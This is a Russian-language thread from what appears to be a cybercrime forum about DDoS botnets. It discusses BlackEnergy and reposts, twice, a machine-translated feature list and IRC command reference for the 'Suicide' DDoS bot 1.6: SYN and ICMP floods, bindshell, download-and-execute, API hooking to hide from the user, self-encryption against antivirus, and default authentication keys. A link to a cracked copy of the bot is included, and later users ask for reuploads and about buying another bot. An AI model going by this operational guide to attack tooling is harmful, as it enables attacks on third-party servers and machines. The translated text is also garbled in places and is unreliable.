А BlackEnergy чем был плох? ''Дубинка'' ещё та была
-
XSS.stack #1 – первый литературный журнал от юзеров форума
DDoS bot
- Автор темы ammok
- Дата начала
- Автор темы
- Добавить закладку
- #22
Mail2k
А BlackEnergy не так сильно сервера колотит, он скорее мусорит, в свое время thuglife боты множество сегментов сети в парализованном состоянии держали, сейчас применить настолько же эффективно вряд ли удастся, но поколотить с десяток хороших серверов можно.
p.s. каждому свое в этой жизни, поверьте, не у меня одного хорошие впечатления от этой программки остались.
А BlackEnergy не так сильно сервера колотит, он скорее мусорит, в свое время thuglife боты множество сегментов сети в парализованном состоянии держали, сейчас применить настолько же эффективно вряд ли удастся, но поколотить с десяток хороших серверов можно.
p.s. каждому свое в этой жизни, поверьте, не у меня одного хорошие впечатления от этой программки остались
.
По теме ничего сказать не могу,так как ботами не занималась,но косяки которые тут указаны,поймёт самый начинающий реверсер!Говорит,это о том,
что качество на самом последнем месте,главное бабки сорвать побыстрому!
Нового уже нет давно,в паблике естестенно!Старая школа,кодеры-исследователи,где то далеко!Скорбно!
что качество на самом последнем месте,главное бабки сорвать побыстрому!
Нового уже нет давно,в паблике естестенно!Старая школа,кодеры-исследователи,где то далеко!Скорбно!
- Автор темы
- Добавить закладку
- #24
salamandra
Эта программка старая, и тем не менее это самая сильная "дубинка" в моих руках бывавшая, звучит как абсурд, но факт.
p.s. уже задался вопросом: что есть лучшая "дубинка" сегодня?
Эта программка старая, и тем не менее это самая сильная "дубинка" в моих руках бывавшая, звучит как абсурд, но факт.
p.s. уже задался вопросом: что есть лучшая "дубинка" сегодня?
А админка переделанная на php осталась ?
- Автор темы
- Добавить закладку
- #26
Mail2k
переписать было проще чем установить cgi в первый раз
меня заинтересовал вопрос "модных дубинок", в продолжение темы
нужно поискать на харде, но боюсь она сгинула вместе с dvd дисками
переписать было проще чем установить cgi в первый раз
меня заинтересовал вопрос "модных дубинок", в продолжение темы
Барракуда с ддос модулем, ну просто пик сезона ((=
suecide ddos bot 1.6
Особенности:
- Управление на основе веб-бот и IRC
- Поддержка в IRC немного одновременно рабочих botmasters
- Аутентификация на МКС с помощью одной клавиши
- Отдел botmasters на уровне прав доступа
- Firewall detouring путем инъекций в код в процесс, возложенных
- Объезд по контролю за компонентами альтернативно приема метод обрабатывает и запуска в "опасный" код
- Маскирование в системе методом перехвата API-функций CreateProcessW, RegEnumValue, FindNextFileA, FindNextFileW
- Использование selfmodifycation код для защиты вашего строить из исследований (соответственно, никто не сможет узнать вашу конфигурацию в СЭП)
- Шифрование тела из бот по случайным образом порожденных ключом (который в паре с selfmodifycation код и собственные алгоритмы обнаружения полностью исключает из бот подпись анализаторы не будет создавать два идентичных копий в СЭП)
- ICMP-наводнение
- SYN-наводнение
- Плагин двигателя (можно загрузить любое количество подключаемых модулей "с наскока" в виде DLL-файлы)
- Отображение информации о контролируемых машина
- Bindshell
- А SOCKS4 прокси -
- Функция загрузки и запуска на любой файл
- Функция самоуничтожения
- Диалог с пользователем, контролируемой машины через MessageBox =)))
- А удобный веб-интерфейс с возможностью назначения для различных роботов разные команды
Список IRC-команд:
-! Вс хэша - разрешение для дальнейшего botnet контроля, хеширования должны быть получены с помощью программы hash.exe: hash.exe user_id_on_channel ключ. Одним из ключевых - любое значение целочисленного типа, по умолчанию для корневой (0 GID) - 3927555, для простых пользователей - 31337.
Например:
C: \> Хэш: RKL! Cr4sh@224BEAE1.EF026A60.32D84835.IP 31337
ул =: RKL! cr4sh@224BEAE1.EF026A60.32D84835.IP
ключ = 31337
Хэш = 48659496128643785403785944323783784324320
C: \>
Выход пользователь автоматически, в результате чего в канале.
-! МКЛПБ hostname_or_ip - наводнение ICMP-атаки на хост
-! Син hostname_or_ip - SYN-наводнение нападение на хост
-! Стоп - остановить атаку
-! Скачать filename_on_remote_machine URL - загрузить и выполнить. EXE-файл
-! Сообщение с текстом - показывать по захватили машину MessageBox с заданным текстом
-! Остановить - выключить IRC-клиент
-! Delplugin имя - удаление плагина в! updateplugins - обновить плагин сразу
-! Sysinf - просмотр информации о системе
-! Умереть - самоуничтожение
-! Установить значение частоты - частоты пакетной передачей по наводнения в миллисекундах (по умолчанию 4)
-! Packetsize установить значение - размер в ICMP-пакетов от наводнения в байтах (по умолчанию 50000)
-! Ключевых GID один ключ - создание ключа хэш-функции для отдельных GID. Простые пользователи GID 1, в первые 3 команды, которые доступны только для них
hxxp://rs325.rapidshare.com/files/132958313/Suicide_1.6_full_creck.rar
Особенности:
- Управление на основе веб-бот и IRC
- Поддержка в IRC немного одновременно рабочих botmasters
- Аутентификация на МКС с помощью одной клавиши
- Отдел botmasters на уровне прав доступа
- Firewall detouring путем инъекций в код в процесс, возложенных
- Объезд по контролю за компонентами альтернативно приема метод обрабатывает и запуска в "опасный" код
- Маскирование в системе методом перехвата API-функций CreateProcessW, RegEnumValue, FindNextFileA, FindNextFileW
- Использование selfmodifycation код для защиты вашего строить из исследований (соответственно, никто не сможет узнать вашу конфигурацию в СЭП)
- Шифрование тела из бот по случайным образом порожденных ключом (который в паре с selfmodifycation код и собственные алгоритмы обнаружения полностью исключает из бот подпись анализаторы не будет создавать два идентичных копий в СЭП)
- ICMP-наводнение
- SYN-наводнение
- Плагин двигателя (можно загрузить любое количество подключаемых модулей "с наскока" в виде DLL-файлы)
- Отображение информации о контролируемых машина
- Bindshell
- А SOCKS4 прокси -
- Функция загрузки и запуска на любой файл
- Функция самоуничтожения
- Диалог с пользователем, контролируемой машины через MessageBox =)))
- А удобный веб-интерфейс с возможностью назначения для различных роботов разные команды
Список IRC-команд:
-! Вс хэша - разрешение для дальнейшего botnet контроля, хеширования должны быть получены с помощью программы hash.exe: hash.exe user_id_on_channel ключ. Одним из ключевых - любое значение целочисленного типа, по умолчанию для корневой (0 GID) - 3927555, для простых пользователей - 31337.
Например:
C: \> Хэш: RKL! Cr4sh@224BEAE1.EF026A60.32D84835.IP 31337
ул =: RKL! cr4sh@224BEAE1.EF026A60.32D84835.IP
ключ = 31337
Хэш = 48659496128643785403785944323783784324320
C: \>
Выход пользователь автоматически, в результате чего в канале.
-! МКЛПБ hostname_or_ip - наводнение ICMP-атаки на хост
-! Син hostname_or_ip - SYN-наводнение нападение на хост
-! Стоп - остановить атаку
-! Скачать filename_on_remote_machine URL - загрузить и выполнить. EXE-файл
-! Сообщение с текстом - показывать по захватили машину MessageBox с заданным текстом
-! Остановить - выключить IRC-клиент
-! Delplugin имя - удаление плагина в! updateplugins - обновить плагин сразу
-! Sysinf - просмотр информации о системе
-! Умереть - самоуничтожение
-! Установить значение частоты - частоты пакетной передачей по наводнения в миллисекундах (по умолчанию 4)
-! Packetsize установить значение - размер в ICMP-пакетов от наводнения в байтах (по умолчанию 50000)
-! Ключевых GID один ключ - создание ключа хэш-функции для отдельных GID. Простые пользователи GID 1, в первые 3 команды, которые доступны только для них
hxxp://rs325.rapidshare.com/files/132958313/Suicide_1.6_full_creck.rar
Cryo. очень старый бот.Можно сказать Музейный экспонат. Есть версия 1.8, но по функциональности по-моему мало чем отличается от этой версии.
Есть версия 1.8, но по функциональности по-моему мало чем отличается от этой версии.
ammok
Попадали в руки сэмплы интересные, но названия ботов не знаю, очень интересные вещи.
Кстати суицид есть родитель Black Energy, последний блэк энерджи, который продавался, хорош, но ему кое-чего не хватает, весьма технологичный бот, по сравнению с аналогами.
salamandra
Есть люди, которые тихо работают, о которых мы не знаем. Все самые высокие malware технологии лежат в паблике, бери да используй
Попадали в руки сэмплы интересные, но названия ботов не знаю, очень интересные вещи.
Кстати суицид есть родитель Black Energy, последний блэк энерджи, который продавался, хорош, но ему кое-чего не хватает, весьма технологичный бот, по сравнению с аналогами.
salamandra
Есть люди, которые тихо работают, о которых мы не знаем. Все самые высокие malware технологии лежат в паблике, бери да используй
- Автор темы
- Добавить закладку
- #31
SilverT
в паблике лежат исключительно заготовки, все по отдельности так сказать, что бы что-то дельное получилось - нужно долго и усердно трудиться "напильником"...Все самые высокие malware технологии лежат в паблике, бери да используй
я не сомневаюсь что есть что-то очень интересное и современное, но названия этому я тоже по сей день не открыл
Если не трудно перезалейте архив. На рапиде не ищет его.
Ктонить перезалейте софт.. ссылка померла
Подскажите плз, есть ли смысл покупать оптиму версии 5.
Очень хотелосьбы увидеть Оптиму 5 паблике
Все прошло без проблем)))